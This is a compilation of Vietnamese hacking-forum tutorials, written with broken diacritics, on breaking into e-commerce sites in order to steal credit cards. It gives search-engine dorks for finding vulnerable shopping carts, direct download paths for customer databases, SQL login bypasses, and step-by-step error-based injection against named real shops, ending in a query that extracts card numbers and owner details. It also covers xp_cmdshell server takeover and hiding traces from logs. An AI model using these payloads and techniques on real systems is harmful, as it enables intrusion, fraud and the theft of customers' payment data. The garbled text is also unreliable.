$shipping_percentage = ".15"; $sc_order_email = "wrl\@igc.org"; $sc_root_url = "http://www.warresisters.org/store"; $sc_admin_email = "lit\@warresisters.org"; $sc_domain_name_for_cookie = ".warresisters.org"; $sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi"; $sc_root_web_path = "/home/serve/resist/Html/Products"; $sc_path_for_cookie = "/store"; $path_to_html = "../Html"; 1; c g ? 1 s thng tin quan trng v c s d liu Tn v mt khu : Khng cn Sau Xa ci commerce_user_lib.pl i thay bng dng ch tm $sc_order_log_name v .... ============================ III-Li shopdisplaycategories Cch thc tm : Dng Google Cu tm kim : shopdisplaycategories Kt qu : Trong link cc trang b li , bn thay shopdisplaycategories.asp thnh shopdbtest.asp c g ? Bn bit c ng dn ti c s d liu Th Tn Dng Tn v mt khu : Khng cn Sau : Thay shopdbtest.asp bng phn tr li ca xdatabase ( bn tm pha trn ) ============================
IV-Li SQL Injection Cch thc tm : Dng Google Cu tm kim : admentor Kt qu : Bn vo trang b li , ng nhp vi Username v Password l 'or''=' c g ? By gi bn nm mi hat ng qun l ca website trong vai Admin Tn v mt khu : 'or''=' Sau : Bn t tm hiu ============================ IV-Li datasources Cch thc tm : Dng Google Cu tm kim : datasources/ hay config/datasources/ Kt qu :ng dn nhng trang b li ny c g ? T y bn thm vo expire.mdb vo sau datasources/ hay config/datasources/ Tn v mt khu : Khng cn Sau : Bn ti c kho d liu c credit card
TUTORIAL BY CVHINT
-Lu ri khng gh qua din n chi s anh em nhNn tui xin gp mt bi vit gi l ng gp cho din n t xu vi li v vic hack ti s khng tham gia mt thi gian di nn vic share ht kinh nghim hck shop cho anh em ch cn l vn thi gian v vy ai khoi ci d cc th nn ch bi vit ny ca ti nh. By gi chng ta s i vo vn chnh ca bi vit ny.Ti bit hack shop th ai cng bit nhng hack th no c cc th rt nhiu ngi khng bit hoc nu c th cha kp n die v l do cch hack ai cng bit ( Nu ti on khng lm th bi vit ca Hiupc ai cng c qua ri nh ).Th nn ti s ch cho cc bn mt cch hack dng sql mi cha ph bin lm v t ngi hack c. Nhng xin mi ngi cho tui ni vi li.Ti tng lt qua cc site ca viethacker v vo trong box tho lun v sql xem th no th c nhiu ngi cho kin th ny "SQL l mt li b li thi".Tri nghe m bui ri ri. Ni cho cc bn nghe SQL khng h li thi ch yu l c bin ci li thi thnh li ph bin ca ring mnh hay khng li l chuyn khc. Thi ni nhiu mt qu nn vit bi y : Vo google search t kho no m cc bn bit nh.Ti xin ng gp mt vi t kho bn no bit ci no th share cho mi ngi nh.: shopcategories.asp?id= /shop/ shopping product.asp?ProductID allinurl:"shopdisplayproducts.asp?id= allinurl:"shopdisplayproducts.asp?id=1 allinurl:"shopdisplayproducts.asp?id=2 allinurl:".com/shopdisplayproducts.asp?id= allinurl:".net/shopdisplayproducts.asp?id= .asp?=catalogid= .asp?cid= alliurl: shop$.asp?$= shopexd.asp? shopreviewlist.asp?id=1 shopreviewadd.asp?id= ri search i mt shop gi s nh th ny : www.cvhint.com/shopdisplayproducts.p?id=1 Ri khi thm du ' vo n khng ra li th lm th no.Tri khng l n khng c li. Th l bit ngay thi.Ta thay ci link khc th xem sao.Trong vd ny ti thay ci shopdisplayproducts.asp?id=1 = shoptellafriend.asp.asp?id=1 v thm du ' li xem sao.OOOOOOh li ka.Good. Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'catalogid = 12''. /vshop/shoptellafriend.asp, line 183 Chi v sao ti gi ci ny l nng cao cc bn nn ci line ca n .Thng cc bn hack theo bi vit ca Hieupc th ch hack c ci line c ch s cao thi cn cc line di 200 thng th b chiu phi khng no.( Lc trc ti gp hoi nn hiu m) Tip tc dng truy vn m hieupc ch cho cc bn r s t t s ra mt ch s c bit y thng l s 3 v y l kinh nghim chin trng tui share cho anh em y.:
line191 >>> 56 line184 >>> 47,43,53 line188 >>> 53,56, 60 line191 >>> 48 line185 >>> 86,43 line202 >>> 84,91 line208 >>> 48,57 line64 >>> 53 line211,187 >>> 43 line59 >>> 70 line58 >>> 43 --------------- y l cc line thng gp .Mai mt ch cn gp cc line ny th cc bn ch cn r s n nhng s trn l ra ch s 3 khai thc . Tip tc khi ra ci bng c cha ch s 3 ri chng ta cn ly user v pass th nhp ci ny vo : fldusername%2b'/'%2bfldpassword khi cc bn nhp truy vn vo th s ra ci pass v user ngay s 3 m thi. Cn link admin thng l shopadmin.asp nhng ci cch ny ca ti nu ly link l shopadmin.asp th hu nh khng c.Ti s ch mi ngi phn tip theo cn by gi i ri i n ci .Mong anh em hiu bi vit ny ca ti v thc hnh thnh cng.Ti vit khng c ci g gi l du ngh nh cc bn khc ch cn anh em c v hiu th s c shop ngon m n di di thi.y l mt dng nng cao hi nguy him nn tui khng th a ra vd cho cc bn c nu ai c search thy mt site no th hy post ln cho mi ngi cng hack.Bye Bn quyn : cvhint v mt ngi bn.
TUTORIAL FROM VIETHACKER

Cc bn nghe rt nhiu t sql-injection rt nhiu bn thnh tho nhng vn cn nhiu bn mi lm wen vi lp trnh web cn cha bit ti xin mn php post li da trn cc bi v sql-nect t nhm Vicki , Viethacker.net ...hay m vi t ni khc . + SQL Injection l g? SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin hin nay. Bng cch inject cc m SQL query/command vo input trc khi chuyn cho ng dng web x l, bn c th login (vi quyn Admin) m khng cn username v password, remote execution, dump data v ly root ca SQL server. Cng c dng tn cng l mt trnh duyt web bt k, chng hn nh Internet Explorer, Netscape,.. + Vng hiu v SQL-nect n gin l ch c vy ti s phn tch tip vic khai thc li nh th no , v mi ngi u c nhng cch x l ring VD : http://www.xxx.com/item.asp?item_id=1 - kim tra xem c li khng : thm du ' vo : http://www.xxx.com/item.asp?item_id=1' Nu thy hin th li :c dng vd nh th ny : CODE Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. C:\INETPUB\WWWROOT\xxx\INCLUDE\../lib/dblib.asp, line 95 Th trang web ny b SQL-Inject chng ta c th hon ton khai thc c thng qua vic "Hi p" --> Nhiu bn khi test thy li nh vy lin dng cu lnh ly ht cc bng , ct trong data: http://www.xxx.com/item.asp?item_id=1%2bco...hema.tables))-S thu c kt qu l bng u tin: CODE Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'T005_CC_PACKAGES' to a column of data type int. C:\INETPUB\WWWROOT\xxx\INCLUDE\../lib/dblib.asp, line 95 'T005_CC_PACKAGES' chnh l 1 bng trong data . Nu mun ly tn bng tip theo ta ch vic http://www.xxx.com/item.asp?item_id=1%2bco...n_schema.tables where table_name not in ('T005_CC_PACKAGES' )))-tip tc cho n khi no hin thng bo : Invalid item th l ht table Mun ly tn ct trong bng th lm nh sau :
http://www.xxx.com/item.asp?item_id=1%2bco...n_schema.colums where table_name='tn bng'))-ly tip th li dng not in: http://www.xxx.com/item.asp?item_id=1%2bco...n_schema.colums where table_name="tn bng" not in ('Tn ct bit','tn ct bit')))-Ly gi tr trong ct : http://www.xxx.com/item.asp?item_id=1%2bco...201%20'tn ct'%20from 'tn bng cha ct'))-Mc ch ca nhiu bn l ly ht ton b thng tin v table , colum ca data t khai thc ti khon ng nhp admin ca site . Nhng nhng cch tng bc trn rt mt khi ng Link di qu IE li lun phi dng trnh duyt khc(Mozila hay Netscape..) . + C cch khc nhanh hn : ng nhp bng user: 'or''=' pass: 'or''=' vd nu bn may mn th s tm c ch login vo phn qun l web.
Tng hp cch hack cc cn bn nht!

Thng cc hacker hack cc t nhng li nghim trng ca cc site bn hng trn ton th gii (cn v s nhng site cha fix )...cc li thng gp l : acart2_0 SalesCart Database Storage Insecurity Trong file shopper.cgi Cart32 Sites VP-ASP ProductCar ............ Di y l bi vit chi tit cch hack cc li , tt nhin cng ko phi tui tm ra c cc li ny...v cc li ny oc tm ra rt lu ri...c sang qua sang li....n ni tc gi ca n l ai cng ko cn nh ni na...!!! --------------------------------------------------------------------------------------------Li acart2_0" : u tin cc bn vohttp://google.com/ ( cc bn c th vo cc site tm kim khc nhhttp://av.com/ .... ) search keyword "acart2_0" ,bn thy rt nhiu file mc li ny,do kinh nghim mnh khuyn cc bn nn chn nhng site c dnghttp://url/acart2_0/ v d sitehttp://www.coolrob.com/cart/acart2_0 ,g thm" /acart2_0.mdb "vo ng sau url, enter xong bn thy mn hnh dnload l thnh cng ri ...bn c th down ton b file database *.mdb ca shop bn hng ... --------------------------------------------------------------------------------------------Li VP-ASP: u tin vohttp://google.com/ search t kho "shopdisplaycategories" click vo site bn s thy lhttp://www. sitename.com/shopping/shopdisplaycategories.asp Vic tip theo l chuyn urlhttp://www.sitename.com/shopping/shopdisplaycategories.asp thnh urlhttp://www. sitename.com/shopping/shopdbtest.asp ngha l thay shopdisplaycategories.asp bng shopdbtest.asp ri enter...nu ra tip thm mt trang na...<---ko pht l no page .th bn c c hi down *mdb ca site ny ... sau khi ra trang mi xong,p dng cng thc http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb ] -[vp-asp site] l :http://www.sitename.com/ -[ vp-asp dir] l :shopping -[ xDatabase + .mdb ] s l shopping.mdb nu c mn hnh save th bn thnh cng ri ... ----------------------------------------------------------------------------------------------Li shopper.cgi: vohttp://google.com/ search t kho shopper.cgi hoc shopper.execopy nhng url c dng sitename.com/cgi-bin/ shopper.cgi? sau paste vo browse v thm dng search=action&keywords=ccpower &template=shopper.conf hoc hoc thm dng search=action&keywords=ccpower &template=order1.log vo ng sau,nu may mn bn s tm thy cc----------------------------------- Li ProductCart: Search vi t kha allinurl: /productcart/ http://www.ackits.com/ProductCart/pc/msg.asp? Xa tt c t sau ProductCart i g li on nyhttp://www.ackits.com/ProductCart/ sau thm vo sau database/ EIPC.mdb s thnhhttp://www.ackits.com/ProductCart/database/EIPC.mdb n lc ny ta s download c file .mdb v sau khi download v ri th chc mi ngi bit phi lm g ri ch ................................................ Li Cart32.exe: vo google.com ,search t kha "Cart32.exe v3"u tin vohttp://www.sitename.com/cgi-bin/cart32.exe/sitename Ly Credit Cards :http://www.sitename.com/cgi-bin/cart32/sitename-ORDERS.txt hoc :http://www.sitename.com/cgi-bin/cart32/sitename-OUTPUT.txt
Hack CC thng qua li SalesCart Database Storage Insecurity: Tng qut: Li ny thc cht l d liu ca cc chng trnh mua bn khng c bo mt, m ha hay ct gi cn thn nn bn hon ton c th ly chng mt cch d dng Lu : i khi vi thc t, 1 s link c th khc i, khng phi lc no cng hon ton ng, d liu c khi bao gm c CRD (Credit Card) nn mi vic phi qua proxy (nu khng c proxy th c th ra dch v...) Khai thc: Hy s dng 1 trong nhng link sau: www.victim.com/fpdb/shop.mdb www.victim.com/shoponline/fpdb/shop.mdb www.victim.com/database/metacart.mdb www.victim.com/shopping/database/metacart.mdb www.victim.com/shop/database/metacart.mdb www.victim.com/metacart/database/metacart.mdb www.victim.com/mcartfree/database/metacart.mdb www.victim.com/ASP/cart/database/metacart.mdb V d: site84vn.com c th download cc t y:www.84vn.com/database/metacart.mdb C ngha l database khng h c 1 cht bo mt no c. Download v t ! Trong database c th bao gm: name, surname, address, e-mail, phone number, credit card number, company name..... Bn c th khai thc d liu ny, nhng trong thc t, mi vic khng phi lc no cng sun s c, bn hy tng tng mi server c mt cu trc ring, v d nh ng dn khng phi lc no cng l fpdb/... hay nh nhng link trn, hy tn dng li v th tng ci mt , nhiu khi lwww.victim.com/muaban/fpdb/shop.mdb v vy nu bn xi cch ny hy linh hot trong link tu vo tng site! <----copy by h4a...... ln google tm t kha "inurl:commerce.cgi" Ri okie s a ch online ang ch n vd: ta c site <http://www.warresisters.org/store/commerce.cgi>? xa ci commerce.cgi? i thay bng Admin_files/commerce_user_lib.pl ta s c ## This file contains the user specific variables ## necessary for Commerce.cgi $sc_sales_tax = ".0825"; $sc_sales_tax_state = "NY"; $sc_send_order_to_email = "yes"; $sc_order_log_name = "onlinebookstore.log"; $sc_send_order_to_log = "yes"; $shipping_percentage = ".15"; $sc_order_email = "wrl\@igc.org"; $sc_root_url = "http://www.warresisters.org/store"; $sc_admin_email = "lit\@warresisters.org"; $sc_domain_name_for_cookie = ".warresisters.org"; $sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi"; $sc_root_web_path = "/home/serve/resist/Html/Products"; $sc_path_for_cookie = "/store"; $path_to_html = "../Html"; 1;
xa ci commerce_user_lib.pl i thay bng onlinebookstore.log (tm $sc_order_log_name ) v .... Vic tip theo l thuc v bn -----------------------------------------------------------------------------------------------Vo google g t kho tek9.aspta c link c dng tng t nh th ny https://ionicpurifier.com/tek9.asp?pg=orders&mode=search by u t /tek9.asp/ g thm /intranethttps://ionicpurifier.com/intranet/tek9.asp...ers&mode=search Sau ng nhp vi user v pass 'or''='nu may mn th s vo c , v n cc tha h cn rt nhiu site b li ny -----------------------------------------------------------------------------------------------Search keyword in google.com.vn : " Shoping /admin " http://shopping.richardhealey.com/admin_login.asp http://families-online.org/admin_login.asp user/pass : ' or 1=1-Code ca site cho php exploit ln SQL Server . ------------------------------------------------------------------------------------------------
Hack shop qua li SQL server injection
gioi thieu so qua cho anh em biet ve hack sql server inject ha ! hack bang ky thuat convert noi nom na la convert 1 bieu thuc dang string sang dang int nhung ko the thuc hien duoc gay thong bao loi (co nhung shop ma ta khong nhan duoc thong bao cua no,vi value=hidden),vi the truoc tien de hack duoc shop ODBC MySQL server2000 hay 7.0 thi it nhat anh em cung phai xem qua source 1 chut ha,de roi con biet co nen hack theo cach nao`. o day chi gioi thieu cach convert dung` de lay thong bao loi thoi,neu may bac' can hack ca server thi noi nhieu,noi dai dong lam... Detail: search tren cac trang search engine tuy anh em thich thoi,hien co rat nhieu trang search engine ma anh em thuong dung nhu http://www.google.com/ hoachttp://www.froogle.google.com/ http://www.av.com/ http://www.alltheweb.com/ yahoo.com ...... ok----search for: allinurl: "/shop/viewproduct.asp" hoac may bac co the search = tu key word allinurl: "/shop/index.asp" (nhung cai tu khoa nay van chua xac nhan duoc tinh dung dan cua no,vi no cho ra tat rat nhieu site,ma ko phai ODBC MySQL database,hic,ma thuong la` JSP(java server page) hoac JET, hoac VB.net....net va de nay can phai co su no luc cua anh em trong viec test. ok co' duoc muc tieu roi chon dai 1 thang,vd:
http://www.mcmessentials.com.au/shop/viewp...20&categoryid=5
http://www.mcmessentials.com.au/shop/viewp...20&categoryid=5
okay co muc tieu roi bat dau test no ha http://www.mcmessentials.com.au/shop/viewp...tegoryid=5' neu CSDL cua no duoc viet = ODBC MySQL server thi anh em se nhan duoc thong bao sau Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shop/include/viewproduct.asp, line 3 okay,con neu ko thi ko thay gi het,hoac la` ban phai xem trong source de biet. ok bat dau tim table co the test theo cac cach sau ma em da biet ;having 1=1--sp_password 'having 1=1--sp_password "having 1=1--sp_password (having 1=1--sp_password )having 1=1--sp_password (space)having 1=1--_sp_password (%20 la space la khoang trang day) thuong thi test = cau truy van (space)having 1=1--sp_password la duoc duyet qua ok *luu y' cac anh em 1 dieu rat can thiet 1--%2b co nghia la dau + nhung ma truyen truc tiep dau + vao se bi SQL filter mat bat buoc phai co --sp_password de marks log tranh bi phat hien http://www.mcmessentials.com.au/shop/viewp...=1--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'categories.label' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /shop/include/viewproduct.asp, line 9 ta biet duoc table categories,column la label,bay gio ta di lay tat ca cac table cua column label thuoc table categories bay gio di lay user_name cua shop thong qua cau truy van sau %2bconvert(int,user_name())--sp_password day du la` http://www.mcmessentials.com.au/shop/viewp...))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'braunshop' to a column of data type int. /shop/include/viewproduct.asp, line 3
'braunshop' la truong user_name cua shop *luu y 2--truong user_name() la de xac dinh user hien tai,neu no la dbo thi ta co kha nang hack thang vao ca server ma ko can quyen admin,con neu ko thi ta co nhung buoc trung gian de chiem,ok ta dung lai o viec lay cc tu shop ma thoi,ko noi den chuyen chiem ca server,much dich de anh em hoc hoi,va trao doi kinh nghiem la chinh,ko loi keo anh em pha hoai nghiem trong den bat cu ai khac nen toi chi post va dung lai o phan lay cc ma thoi,con neu ai co thu oan gi voi thang nao,muon deface,lay pass,lay root,lay server,host thi lien he voi toi ok bay gio ta se lan luot lay cac table tren column label lay table thu 1 thong qua cau truy van sau %2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables))--sp_password day du la` http://www.mcmessentials.com.au/shop/viewp...))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'categorieslist' to a column of data type int. /shop/include/viewproduct.asp, line 3 ok table 1 la 'categorieslist',muon lay table thu 2 thi phai dung den where table_name not in('table1') cau truy van nhu sau: %2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables%20where% 20table_name%20not% 20in('categorieslist')))--sp_password http://www.mcmessentials.com.au/shop/viewp...))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'allorders' to a column of data type int. /shop/include/viewproduct.asp, line 3 table 2 la` 'allorders' muon lay table thu 3 va cac table co lai thi tiep tu lam tuong tu nhu lay table thu 2 vay %2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables%20where% 20table_name%20not% 20in('categorieslist','allorders')))--sp_password day la tat ca cac table cua shop vua lay duoc 'categorieslist','allorders','categories','categor ymembers','deliveryZones','dtproperties','essorder s','fullorder','keywords', 'optiongroupmembers','optiongroups','optiongroupsl ist','optionmembers','options','optionslist','orde roptions','orderoptions-options','orderproducts','orderproducts-products','orders','products','productscategories','products-options','searchresults','sysconstraints','syssegm ents'
ok sau khi lay duoc tat ca cac table roi thi ban bat dau lay colum cua table,co 2 kieu lay column,1 la lay tat ca cac column,ko co muc dich gi hoac de kiem tra toan bo database,2 la` ta da xac dinh duoc can phai lay column trong table nao,sau do moi lay,toi thi chi lay column trong table nao co cc thoi,'allorders' hoac 'orders' ok ta lay no thoi cau truy van lay column dau tien la` 1---lay column tren tat ca cac table,ko can biet no thuoc table nao,lay den khi nao het thi thoi,cau truy van co dang %2bconvert(int,(select top 1 column_name from information_schema.columns))--sp_password duoc column1 roi thi dung where column_name not in('column1') ok ha 2--lay column tren table da xac dinh truoc cau truy van nhu sau vi du toi lay column tren table orders %2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders'))-sp_password http://www.mcmessentials.com.au/shop/viewp...))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'orderid' to a column of data type int. /shop/include/viewproduct.asp, line 3 column dau tien la` 'orderid' lay column thu 2 thi can them and column_name not in('orderid') %2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders' and column_name not in('orderid')))--sp_password http://www.mcmessentials.com.au/shop/viewp...))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'created' to a column of data type int. /shop/include/viewproduct.asp, line 3 va lan luot lay cho het cac column cua table 'orders' khi anh em da lay duoc tat ca cac column cua table 'orders'roi thi chi con viec sau cung hap dan nhat ma thoi,do la lay cc,anh em hay viet thanh 1 cau truy van de lay cc dua vao tat ca cac column cua anh em nhan duoc,moi shop no co cac field database khac nhau,nhung hau het cac shop duoc search duoi dang allinurl: "/shop?viewproduct.asp" thi chi co 1 kieu truy van duy nhat,vi em da thu qua tat ca roi hhihihi cai nao cung ok ca may anh em khoi mat cong xap xep lai de viet thang cau truy van chi cho met,toi dua luon cho anh em xai choi lay cc dau tien
%2bconvert(int,(select%20top%201%20cardtype%2b'%20 Name:'%2bcardname%2b'%20addr:%20'%2baddress% 2b'%20 suburb:%20'% 2bsuburb%2b'%20state:%20'%2bstate%2b'%20zip:%20'%2 bpostcode%2b'%20country:%20'%2bcountry%2b'% 20phone :%20'%2bphone% 2b'%20email:%20'%2bemail%2b'%20cardnumber:%20'%2bc ardnumber%2b'%20expireymonth:%20'% 2bexpirymonth%2b '%20year:%20'% 2bexpiryyear%20from%20orders))--sp_password lay' cc thu 2 thi ta them vao o sao ....from orders where cardnumber not in('so card dau tien') va lan luot lay het cac credit card co tren do' nhu cai shop o tren thi de dung cho may bac thuc tap va de co them kinh nghiem ma thoi,vi day chi de hoc hoi,ko nham muc dich pha hoai bat cu ai . Hack Sql Inject nng cao Cc bn th xem mt cu truy vn SQL: select id, forename, surname from authors th 'id','forename' v 'surname' l column ca table author,khi cu truy vn trn lm vic th n s cho kt qu tt c cc dng trong table author.Xem cu truy vn sau: select id, forename, surname from authors where forename = 'john' and surname = 'smith' y l cu truy vn c iu kin chc khng ni cc bn cng bit,n cho ra kt qu tt c nhng ai trong csdl vi forename = 'john' and surname = 'smith' V vy khi vo gi tr u vo khng ng nh trong csdl liu: Forename: jo'hn Surname: smith Cu truy vn tr thnh: select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith' Cu truy vn trn khi c x l th n s pht sinh li: Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'hn'. L do l ta lng vo du nhy n "'" v gi tr vo tr thnh 'hn' sai so v csdl vy s pht sinh li li dng ci ny i attacker c th xo d liu ca bn nh sau: Forename: jo'; drop table authors-Table author s b xa>nguy him phi khng Nhn vo on code asp sau:y l mt form login
<HTML> <HEAD> <TITLE>Login Page</TITLE> </HEAD> <BODY bgcolor='000000' text='cccccc'> <FONT Face='tahoma' color='cccccc'> <CENTER><H1>Login</H1> <FORM action='process_login.asp' method=post> <TABLE> <TR><TD>Username:</TD><TD><INPUT type=text name=username size=100% Page 4 width=100></INPUT></TD></TR> <TR><TD>Password:</TD><TD><INPUT type=password name=password size=100% width=100></INPUT></TD></TR> </TABLE> <INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'> </FORM> </FONT> </BODY> </HTML> y l code 'process_login.asp' <HTML> <BODY bgcolor='000000' text='ffffff'> <FONT Face='tahoma' color='ffffff'> <STYLE> p { font-size=20pt ! important} font { font-size=20pt ! important}
</STYLE> <%@LANGUAGE = JScript %> <% function trace( str ) { if( Request.form("debug") == "true" ) Response.write( str ); } function Login( cn ) { var username; var password; username = Request.form("username"); password = Request.form("password"); var rso = Server.CreateObject("ADODB.Recordset"); var sql = "select * from users where username = '" + username + "' and password = '" + password + "'"; trace( "query: " + sql ); rso.open( sql, cn ); if (rso.EOF) { rso.close(); %> <FONT Face='tahoma' color='cc0000'> <H1> <BR><BR>
<CENTER>ACCESS DENIED</CENTER> </H1> </BODY> </HTML> <% Response.end return; } else { Session("username") = "" + rso("username"); %> <FONT Face='tahoma' color='00cc00'> <H1> <CENTER>ACCESS GRANTED<BR> <BR> Welcome, <% Response.write(rso("Username")); Response.write( "</BODY></HTML>" ); Response.end } } function Main() { //Set up connection var username var cn = Server.createobject( "ADODB.Connection" );
cn.connectiontimeout = 20; cn.open( "localserver", "sa", "password" ); username = new String( Request.form("username") ); if( username.length > 0) { Login( cn ); } cn.close(); } Main(); %> y l cu truy vn SQL: var sql = "select * from users where username = '" + username + "' and password = '" + password + "'"; nu hacker vo nh sau: Username: '; drop table users-Password: th table 'user; s b xo,v ta c th vt qua bng cch sau:bypass cc bn bit ht ri ti khng ni li na trng username hacker c th vo nh sau: Username: ' union select 1, 'fictional_user', 'some_password', 1-v d table user c to nh sau: create table users( id int, username varchar(255), password varchar(255), privs int ) v insert vo:
insert into users values( 0, 'admin', 'r00tr0x!', 0xffff ) insert into users values( 0, 'guest', 'guest', 0x0000 ) insert into users values( 0, 'chris', 'password', 0x00ff ) insert into users values( 0, 'fred', 'sesame', 0x00ff ) Cc hacker s bit c kt qu cc column v table qua cu truy vn having 1=1 Username: ' having 1=1-Li pht sinh: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /process_login.asp, line 35 Tip tc ly cc ci cn li: Username: ' group by users.id having 1=1-Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35 >> bit c column 'username' ' group by users.id, users.username, users.password, users.privs having 1=1-Cho n khi khng cn bo li th dng li vy l bn bit table v column cn khai thc ri,by gi n i ly gi tr ca n: xc nh ni dung ca column ta dng hm sum() Username: ' union select sum(username) from users-[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /process_login.asp, line 35
Gi tr ca username l varchar,khng ni cc bn cng bit l do,cn dng vi id th sao nh: Username: ' union select sum(id) from users-Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /process_login.asp, line 35 Vy l ta c th insert vo csdl: Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)-Ly Version ca server: Username: ' union select @@version,1,1,1-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int. /process_login.asp, line 35 c th dng convert() nhng ti ch cc bn dng union ,cc bn th c ni dung ca cc user trogn table nh sau: Username: ' union select min(username),1,1,1 from users where username > 'a'-Chn gi tr nh nht ca username v cho n ln hn 'a' > pht sinh li: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int. /process_login.asp, line 35 Vy l ta bit 'admin' acc tn ti,tip tc xem sao:
Username: ' union select min(username),1,1,1 from users where username > 'admin'-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int. /process_login.asp, line 35 Vy l khi c username > ly pass: Username: ' union select password,1,1,1 from users where username ='admin'-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int. /process_login.asp, line 35 y l k thut m bn c th ly c user mt cch cao cp: To mt script nh sau: begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end >cau truy vn: Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end-To mt table 'foo' vi mt column l 'ret' Tip tc: Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int. /process_login.asp, line 35 (Hnh nh mrro dng kiu ny vo VDC) Xo du vt: Username: '; drop table foo-Mt hacker khi iu kin c csdl th h mun xa hn l iu khin h thng mng ca server lun,mt trong s cch : 1-S dng xp_cmdshell khi c quyn 'sa' 2-S dng xp_regread c register,bao gm SAM 3-Chy link query trn server 4-To script trn server khai thc 5-S dung 'bulk insert' c bt c file no trn h thng 6-S dng bcp to qun cho text file trn server 7-S dng sp_OACreate, sp_OAMethod and sp_OAGetProperty to script (ActiveX) chy trn server [xp_cmdshell] Chc cc bn cng nghe nhiu ri v d: exec master..xp_cmdshell 'dir' exec master..xp_cmdshell 'net1 user' S dng thi hnh cc lnh ca dos vvv.. rt hu hiu [xp_regread] Cc hm lin quan... xp_regaddmultistring xp_regdeletekey xp_regdeletevalue
xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite V d: exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\pa rameters','nullsessionshares' Xc inh null-session share c tn ti trn server exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Servi ces\snmp\parameters \validcommunities' v... cn nhiu th na [Other Extended Stored Procedures] services: exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server' >ng qua cng bit n lm g... [Importing text files into tables] S dng 'bulk insert' chn text file vo th mc hin thi,to table n: create table foo( line varchar(8000) ) tip tc: bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp' [Creating Text Files using BCP] VD: bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar [ActiveX automation scripts in SQL Server] Dng 'wscript.shell'
